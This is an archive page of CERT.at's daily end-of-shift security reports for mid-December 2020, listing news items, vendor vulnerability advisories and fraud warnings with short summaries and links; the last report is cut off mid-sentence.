===================== = End-of-Day report = ===================== Timeframe: Mittwoch 16-12-2020 18:00 − Donnerstag 17-12-2020 18:00 Handler: Robert Waldner Co-Handler: Dimitri Robl ===================== = News = ===================== ∗∗∗ Maximizing Your Defense with Windows DNS Logging ∗∗∗ --------------------------------------------- In part 3 of 5 of this blog series, learn how to improve your log collection deployment. Follow a sample Windows log scenario and receive a deployment checklist to help optimize your DNS logging. --------------------------------------------- https://www.domaintools.com/resources/blog/maximizing-your-defense-with-win… ∗∗∗ IoT: Wenn Sicherheitsrisiken unter dem Weihnachtsbaum landen ∗∗∗ --------------------------------------------- Experten haben beliebte, vernetzte Gadgets auf Sicherheitslücken und Datenhunger untersucht und Erschreckendes festgestellt. --------------------------------------------- https://futurezone.at/netzpolitik/iot-wenn-sicherheitsrisiken-unterm-weihna… ∗∗∗ DNS Logs in Public Clouds, (Wed, Dec 16th) ∗∗∗ --------------------------------------------- The current Solarwinds/Sunburst/Fireeye incident and its associated command&control (C2) traffic to avsvmcloud[.]com domains have spurred potentially affected Solarwinds customers to searching their logs and data for any presence of this C2 domain. --------------------------------------------- https://isc.sans.edu/diary/rss/26892 ∗∗∗ The NoneNone Brute Force Attacks: Even Hackers Need QA ∗∗∗ --------------------------------------------- For the last few weeks we’ve seen and blocked an increase in brute-force, credential stuffing, and dictionary attacks targeting the WordPress xmlrpc.php endpoint, on some days exceeding 150 million attacks against 1.9 million sites in a 24-hour period. --------------------------------------------- https://www.wordfence.com/blog/2020/12/the-nonenone-brute-force-attacks-eve… ===================== = Vulnerabilities = ===================== ∗∗∗ WordPress plugin with 5 million installs has a critical vulnerability ∗∗∗ --------------------------------------------- The team behind a popular WordPress plugin has disclosed a critical file upload vulnerability and issued a patch. The vulnerable plugin, Contact Form 7, has over 5 million active installations making this upgrade a necessity for WordPress site owners out there. --------------------------------------------- https://www.bleepingcomputer.com/news/security/wordpress-plugin-with-5-mill… ∗∗∗ CVE-2020-25695 Privilege Escalation in Postgresql ∗∗∗ --------------------------------------------- This is my first and probably only post for the year, and covers a fun privilege escalation vulnerability I found in Postgresql. This affects all supported versions of Postgresql going back to 9.5, it is likely it affects most earlier versions as well. (Notiz: fehlerbereinigte Versionen wurden am 12. Nov. 2020 veröffentlicht.) --------------------------------------------- https://staaldraad.github.io/post/2020-12-15-cve-2020-25695-postgresql-priv… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firefox-esr, sympa, thunderbird, tomcat8, and xerces-c), Fedora (fprintd, kernel, libfprint, and synergy), Mageia (bitcoin, dpic, firefox, jasper, jupyter-notebook, sam2p, thunderbird, and x11-server), Oracle (firefox, gd, kernel, net-snmp, openssl, python-rtslib, samba, and targetcli), Red Hat (fapolicyd, openshift, Red Hat Virtualization, and web-admin-build), SUSE (xen), and Ubuntu (unzip). --------------------------------------------- https://lwn.net/Articles/840583/ ∗∗∗ Security Advisory - Out Of Bound Read Vulnerability in Huawei Smartphone ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-… ∗∗∗ Security Advisory - Use after Free Vulnerability in Huawei Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-… ∗∗∗ Security Advisory - Information Leak Vulnerability in Huawei Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-… ∗∗∗ Security Advisory - Resource Management Errors Vulnerability in Huawei Smartphone Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-… ∗∗∗ Security Bulletin: A GNU glibc vulnerability affects IBM Watson Text to Speech and Speech to Text (IBM Watson Speech Services for Cloud Pak for Data 1.2) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-gnu-glibc-vulnerability… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure. (CVE-2020-4386) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: Spring Framework vulnerabilities affect IBM Watson Text to Speech and Speech to Text (IBM Watson Speech Services for Cloud Pak for Data 1.2) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-spring-framework-vulnerab… ∗∗∗ Security Bulletin: Apache Tomcat vulnerabilities affect IBM Watson Text to Speech and Speech to Text (IBM Watson Speech Services for Cloud Pak for Data 1.2) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-tomcat-vulnerabili… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Performance Tester ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Java Vulnerablity affects IBM Watson Speech Services for Cloud Pak for Data 1.2 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-java-vulnerablity-affects… ∗∗∗ Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Manager previously known as IBM Security Privilege Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK and IBM Java Runtime affects Rational Performance Tester ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Service Tester ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect z/TPF ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ F5 BIG-IP: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1245 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.12.2020
by Daily end-of-shift report 16 Dec '20

16 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 15-12-2020 18:00 − Mittwoch 16-12-2020 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Video: Sicher einkaufen im Amazon Marketplace ∗∗∗ --------------------------------------------- Auf Amazon können Sie direkt von Amazon, aber auch von unabhängigen Marketplace-Händlerinnen und Händlern bestellen. Vor allem im Marketplace treiben aber auch Kriminelle ihr Unwesen! In diesem Video erfahren Sie, was der Marketplace ist und vor allem wie Sie auch im Marketplace sicher bestellen. --------------------------------------------- https://www.watchlist-internet.at/news/video-sicher-einkaufen-im-amazon-mar… ===================== = Vulnerabilities = ===================== ∗∗∗ HPE discloses critical zero-day in server management software ∗∗∗ --------------------------------------------- Hewlett Packard Enterprise (HPE) has disclosed a zero-day bug in the latest versions of its proprietary HPE Systems Insight Manager (SIM) software for Windows and Linux. While security updates are not yet available for this remote code execution (RCE) vulnerability, HPE has provided Windows mitigation info and is working on addressing the zero-day. ... The vulnerability ... is tracked as CVE-2020-7200 and it affects HPE Systems Insight Manager (SIM) 7.6.x. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hpe-discloses-critical-zero-… ∗∗∗ VMSA-2020-0028 VMware Carbon Black Cloud macOS Sensor installer file overwrite issue (CVE-2020-4008) ∗∗∗ --------------------------------------------- The installer of the macOS Sensor for VMware Carbon Black Cloud handles certain files in an insecure way. VMware has evaluated the severity of this issue to be in the Low severity range with a CVSSv3 base score of 3.6. --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0028.html ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firefox-esr), Fedora (mingw-openjpeg2, openjpeg2, and synergy), openSUSE (audacity and gdm), Oracle (libexif, libpq, and thunderbird), Red Hat (firefox, gnutls, go-toolset:rhel8, java-1.7.1-ibm, java-1.8.0-ibm, kernel, kernel-rt, linux-firmware, mariadb-connector-c, mariadb:10.3, memcached, net-snmp, nginx:1.16, nodejs:12, openssl, pacemaker, postgresql:10, python-django-horizon, python-XStatic-Bootstrap-SCSS, python-XStatic-jQuery, python-XStatic-jQuery224 and python-django-horizon), Scientific Linux (gd, kernel, pacemaker, python-rtslib, samba and targetcli), SUSE (PackageKit, openssh, spice and spice-gtk), Ubuntu (firefox and imagemagick). --------------------------------------------- https://lwn.net/Articles/840398/ ∗∗∗ ABB Central Licensing System Vulnerabilities, impact on Symphony Plus, Composer Harmony, Composer Melody, Harmony OPC Server ∗∗∗ --------------------------------------------- https://search.abb.com/library/Download.aspx?DocumentID=2PAA123981&Language… ∗∗∗ ABB Multiple Vulnerabilities in Symphony PlusHistorian ∗∗∗ --------------------------------------------- https://search.abb.com/library/Download.aspx?DocumentID=2PAA123982&Language… ∗∗∗ ABB Multiple Vulnerabilities in Symphony Plus Operations ∗∗∗ --------------------------------------------- https://search.abb.com/library/Download.aspx?DocumentID=2PAA123980&Language… ∗∗∗ Security Advisory - Improper Authentication Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200318-… ∗∗∗ Security Advisory - Out of Bound Read Vulnerability in Huawei Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-… ∗∗∗ Security Advisory - Improper Authentication Vulnerability in Huawei Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-… ∗∗∗ Security Advisory - Out Of Bound Read Vulnerability in Huawei Smartphone ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM QRadar SIEM ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: PostgresSQL JDBC Driver as used in IBM QRadar SIEM is vulnerable to information disclosure (CVE-2020-13692) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-postgressql-jdbc-driver-a… ∗∗∗ Security Bulletin: Open Source Security issues for NPS console. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-open-source-security-issu… ∗∗∗ Security Bulletin: Multiple Security Vulnerabilities Affect IBM WebSphere Application Server in IBM Cloud ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: Apache Santuario as used in IBM QRadar SIEM is vulnerable to improper input validation (CVE-2019-12400) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-santuario-as-used-… ∗∗∗ Security Bulletin: IBM RackSwitch firmware products are affected by a vulnerability in the Kernel (CVE-2020-12464) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rackswitch-firmware-p… ∗∗∗ Security Bulletin: A security vulnerability in Node.js npm package affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container may be vulnerable to buffer overflows, Denial of Service or HTTP request smuggling ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: Netcool Operations Insight – Cloud Native Event Analytics is affected by an Apache Commons Codec vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh… ∗∗∗ Security Bulletin: A security vulnerability in Node.js node-forge module affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ QEMU vulnerability CVE-2020-14364 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K09081535?utm_source=f5support&utm_mediu… ∗∗∗ QEMU vulnerability CVE-2020-25084 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K41301038?utm_source=f5support&utm_mediu… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 15.12.2020
by Daily end-of-shift report 15 Dec '20

15 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Montag 14-12-2020 18:00 − Dienstag 15-12-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ SolarWinds hackers have a clever way to bypass multi-factor authentication ∗∗∗ --------------------------------------------- Hackers who hit SolarWinds compromised a think tank three separate times. --------------------------------------------- https://arstechnica.com/?p=1729836 ∗∗∗ Paypal‑Betrugsmaschen – Wie Sie sich schützen können ∗∗∗ --------------------------------------------- Paypal ist einer der größten und beliebtesten Zahlungsdienste und daher im Fadenkreuz vieler Cyberkrimineller. Wie kann man sich vor deren Tricks schützen? --------------------------------------------- https://www.welivesecurity.com/deutsch/2020/12/15/betrugsmaschen-der-paypal… ∗∗∗ Vorsicht: Gefälschte Benachrichtigungen von Paketdiensten im Umlauf ∗∗∗ --------------------------------------------- Warten Sie gerade auf ein Paket? Dann nehmen Sie sich vor gefälschten Benachrichtigungen per E-Mail oder SMS im Namen der Post, DHL oder anderen Paketdiensten in Acht! Kriminelle fälschen E-Mails bekannter Zustelldienste und behaupten darin, es müssten 1-2 Euro Zustellungs- oder Zollgebühren bezahlt werden. Wird diese Gebühr per Kreditkarte bezahlt, buchen Kriminelle Monat für Monat 50-90 Euro ab. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-gefaelschte-benachrichtigun… ∗∗∗ Hospitals are leaving millions of sensitive medical images exposed online ∗∗∗ --------------------------------------------- Cybersecurity researchers discover millions of medical files and associated personal data left discoverable on the open web due to being stored insecurely. --------------------------------------------- https://www.zdnet.com/article/hospitals-are-leaving-millions-of-sensitive-m… ===================== = Vulnerabilities = ===================== ∗∗∗ Xen Security Advisories ∗∗∗ --------------------------------------------- Xen has released 15 Security Advisories. --------------------------------------------- https://xenbits.xen.org/xsa/ ∗∗∗ URL Spoofing Vulnerability in Bitdefender SafePay (VA-8958) ∗∗∗ --------------------------------------------- An Origin Validation Error vulnerability in the SafePay component of Bitdefender Antivirus Plus allows a web resource to misrepresent itself in the URL bar. This issue affects Bitdefender Antivirus Plus versions prior to 25.0.7.29. --------------------------------------------- https://www.bitdefender.com/support/security-advisories/url-spoofing-vulner… ∗∗∗ Apple security updates ∗∗∗ --------------------------------------------- Apple has released the following security updates: iOS 14.3 and iPadOS 14.3, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, macOS Server 5.11, tvOS 14.3, watchOS 7.2, Safari 14.0.2, iOS 12.5, watchOS 6.3 --------------------------------------------- https://support.apple.com/en-us/HT201222 ∗∗∗ libarchive vulnerability CVE-2017-5601 ∗∗∗ --------------------------------------------- An error in the lha_read_file_header_1() function (archive_read_support_format_lha.c) in libarchive 3.2.2 allows remote attackers to trigger an out-of-bounds read memory access and subsequently cause a crash via a specially crafted archive. [...] The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations. --------------------------------------------- https://support.f5.com/csp/article/K50543013 ∗∗∗ SECURITY BULLETIN: December 2020 Security Bulletin for Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 ∗∗∗ --------------------------------------------- Trend Micro has made a Critical Patch (CP) available for Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2. This CP addresses multiple vulnerabilities related to CRSF protection bypass, cross-site scripting (XSS), authorization/authentication bypass, command execution and unauthenticated command injections. --------------------------------------------- https://success.trendmicro.com/solution/000283077 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (libxstream-java and xen), Fedora (curl), openSUSE (curl, kernel, mariadb, and openssl-1_1), Oracle (kernel, libexif, thunderbird, and xorg-x11-server), Red Hat (curl, gd, kernel, kernel-rt, linux-firmware, net-snmp, openssl, pacemaker, python-rtslib, samba, targetcli, and xorg-x11-server), Scientific Linux (libexif, thunderbird, and xorg-x11-server), and SUSE (clamav, gdm, and kernel). --------------------------------------------- https://lwn.net/Articles/840217/ ∗∗∗ Synology-SA-20:28 File Station ∗∗∗ --------------------------------------------- A vulnerability allows remote attackers to read arbitrary files via a susceptible version of File Station. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_20_28 ∗∗∗ Citrix Hypervisor Security Update ∗∗∗ --------------------------------------------- Several security issues have been identified that, collectively, may allow privileged code running in a guest VM to compromise the host or cause a denial of service. --------------------------------------------- https://support.citrix.com/article/CTX286756 ∗∗∗ WAGO Series 750-88x and 750-352 (Update A) ∗∗∗ --------------------------------------------- This updated advisory is a follow-up to the original advisory titled ICSA-20-308-01 WAGO Series 750-88x and 750-352 that was published November 3, 2020, on the ICS webpage on us-cert.gov. This advisory contains mitigations for an Uncontrolled Resource Consumption vulnerability in the WAGO Fieldbus Ethernet coupler. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-308-01 ∗∗∗ Eclipse Jetty vulnerability CVE-2019-10241 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K01869532 ∗∗∗ HCL Domino: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode mit den Rechten des Dienstes ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1237 ∗∗∗ Red Hat Enterprise Linux: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1238 ∗∗∗ Security Bulletin: A security vulnerability in angular.js affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: Gradle version in IBP javaenv and dind images depends on vulnerable Apache Ant ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-gradle-version-in-ibp-jav… ∗∗∗ Security Bulletin: A security vulnerability in GO affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: Vulnerability in nss and nspr CVE-2019-17006. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-nss-and-… ∗∗∗ Security Bulletin: A vulnerability have been identified in jwt-go shipped with IBM Netcool Operations Insight Event Integrations Operator (CVE-2020-26160) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-have-been… ∗∗∗ Security Bulletin: A security vulnerability in Node.js serialize-javascript affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: IBP javaenv and dind images ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibp-javaenv-and-dind-imag… ∗∗∗ Security Bulletin: A security vulnerability in Node.js acorn and bootstrap-select affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: A security vulnerability in GO affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: Vulnerability in libssh2 CVE-2019-17498. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-libssh2-… ∗∗∗ ZDI-20-1444: (0Day) Eaton EASYsoft E70 File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1444/ ∗∗∗ ZDI-20-1443: (0Day) Eaton EASYsoft E70 File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1443/ ∗∗∗ ZDI-20-1442: (0Day) Eaton EASYsoft E70 File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1442/ ∗∗∗ ZDI-20-1441: (0Day) Eaton EASYsoft E70 File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1441/ ∗∗∗ ZDI-20-1429: D-Link DAP-1860 uhttpd Authentication Bypass Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1429/ ∗∗∗ ZDI-20-1428: D-Link DAP-1860 HNAP Authorization Command Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1428/ ∗∗∗ ZDI-20-1427: D-Link Multiple Routers dhttpd Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1427/ ∗∗∗ ZDI-20-1426: D-Link Multiple Routers dhttpd Command Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1426/ ∗∗∗ ZDI-20-1438: (0Day) D-Link DCS-960L HTTP Authorization Header Stack-based Buffer Overflow Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1438/ ∗∗∗ ZDI-20-1437: (0Day) D-Link DCS-960L HNAP LoginPassword Incorrect Implementation of Authentication Algorithm Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1437/ ∗∗∗ ZDI-20-1436: (0Day) D-Link DCS-960L HNAP Login Cookie Format String Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1436/ ∗∗∗ ZDI-20-1435: (0Day) D-Link DCS-960L HNAP Cookie Format String Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1435/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.12.2020
by Daily end-of-shift report 14 Dec '20

14 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 11-12-2020 18:00 − Montag 14-12-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Backdoor in SolarWinds Orion ∗∗∗ --------------------------------------------- Nach einem erfolgreichen Angriff auf den IT-Security-Dienstleister FireEye in der vergangen Woche, wurden neue Informationen zu dem Vorfall veröffentlicht. Wie nun bekannt wurde, erfolgten die Angriffe mittels einer sogenannten "Supply-Chain-Attack"; sowohl SolarWinds als auch FireEye berichten, dass die AngreiferInnen bei einem erfolgreichen Angriff auf SolarWinds eine Hintertür in Updates für das Produkt "SolarWinds Orion" eingeschleust haben. Betroffen sind [...] --------------------------------------------- https://cert.at/de/aktuelles/2020/12/backdoor-in-solarwinds-orion ∗∗∗ pfSense Firewall Configuration Audit with pfAudit ∗∗∗ --------------------------------------------- pfSense is a very popular free and open source firewall solution. It does not only provide classic firewall services but has plenty of features like VPN server or can offer DNS, DHCP, proxy services [...] --------------------------------------------- https://blog.rootshell.be/2020/12/14/pfsense-firewall-configuration-audit-w… ∗∗∗ PyMICROPSIA: New Information-Stealing Trojan from AridViper ∗∗∗ --------------------------------------------- We've identified a new information-stealing Trojan we call PyMICROPSIA, related to the previously identified MICROPSIA malware family. --------------------------------------------- https://unit42.paloaltonetworks.com/pymicropsia/ ===================== = Vulnerabilities = ===================== ∗∗∗ Patchday: Google schließt gefährliche Lücken in Android 8.0 bis 11 ∗∗∗ --------------------------------------------- Es sind wichtige Sicherheitsupdates für eine Reihe von Android-Versionen erschienen. Angreifer könnten unter anderem Schadcode ausführen. --------------------------------------------- https://heise.de/-4988647 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (lxml, openexr, openssl, and openssl1.0), Fedora (libpri, libxls, mediawiki, nodejs, opensc, php-wikimedia-assert, php-zordius-lightncandy, squeezelite, and wireshark), openSUSE (curl, openssh, openssl-1_0_0, python-urllib3, and rpmlint), Red Hat (libexif, libpq, and thunderbird), Slackware (p11), SUSE (kernel, Kubernetes, etcd, helm, openssl, openssl-1_0_0, and python), and Ubuntu (linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, [...] --------------------------------------------- https://lwn.net/Articles/840110/ ∗∗∗ Zero-Day-Lücke im WordPress-SMTP-Plug-in erlaubt das Zurücksetzen von Admin-Passwörtern ∗∗∗ --------------------------------------------- Das Plug-in speichert eine Log-Datei in einem unter Umständen unsicheren Verzeichnis. Hacker erhalten so Zugriff auf die Datei, die auch Links zum Zurücksetzen von Administrator-Passwörtern aufzeichnet. Inzwischen steht ein Patch für die Schwachstelle zur Verfügung. --------------------------------------------- https://www.zdnet.de/88390454/zero-day-luecke-im-wordpress-smtp-plug-in-erl… ∗∗∗ BIND vulnerability CVE-2020-8624 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K91090139 ∗∗∗ Apache Struts vulnerability CVE-2012-0392 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K13434228 ∗∗∗ Apache Struts vulnerability CVE-2012-0391 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K20127031 ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security SiteProtector System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Resilient Platform could allow formula injection in Excel (CVE-2020-4633) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-platform-co… ∗∗∗ Security Bulletin: IBM Cloud Transformation Advisor is affected by a Node.js vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-transformation-… ∗∗∗ Security Bulletin: Security Vulnerabilities in GNU glibc affect IBM Cloud Pak for Data – GNU glibc (CVE-2020-1751) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: Apache Commons Codec could allow a remote attacker to obtain sensitive information, caused by the improper validation of input. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-commons-codec-coul… ∗∗∗ Security Bulletin: Apache Hadoop could allow a remote attacker to obtain sensitive information that could affect IBM Streams. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-hadoop-could-allow… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container may be vulnerable to man in the middle attack through use of OpenSSL (CVE-2019-1551) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affects WebSphere Application Server October 2020 CPU that is bundled with IBM WebSphere Application Server Patterns ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Java vulnerability CVE-2020-2590 affecting IBM Streams ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-java-vulnerability-cve-20… ∗∗∗ Security Bulletin: Open Source Security issues for NPS service provider ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-open-source-security-issu… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.12.2020
by Daily end-of-shift report 11 Dec '20

11 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 10-12-2020 18:00 − Freitag 11-12-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers ∗∗∗ --------------------------------------------- A persistent malware campaign has been actively distributing Adrozek, an evolved browser modifier malware at scale since at least May 2020. At its peak in August, the threat was observed on over 30,000 devices every day. The malware is designed to inject ads into search engine results pages and affects multiple browsers. --------------------------------------------- https://www.microsoft.com/security/blog/2020/12/10/widespread-malware-campa… ∗∗∗ Symantec Messaging Gateway könnte Passwörter leaken ∗∗∗ --------------------------------------------- Es ist ein wichtiges Sicherheitsupdate für Symantec Messaging Gateway erschienen. --------------------------------------------- https://heise.de/-4986723 ∗∗∗ PoC Released for Unpatched Windows Vulnerability Present Since 2006 ∗∗∗ --------------------------------------------- Details and a proof-of-concept (PoC) exploit have been released for an unpatched privilege escalation vulnerability in Windows related to the PsExec administration tool. The vulnerability was discovered by Tenable researcher David Wells and it was disclosed this week after Microsoft failed to release a patch within 90 days. --------------------------------------------- https://www.securityweek.com/poc-released-unpatched-windows-vulnerability-p… ∗∗∗ myusenet.de, bigusenet.de & Co.: Neue betrügerische Streaming-Plattformen führen in Abofalle! ∗∗∗ --------------------------------------------- Immer wieder berichtet die Watchlist Internet von betrügerischen 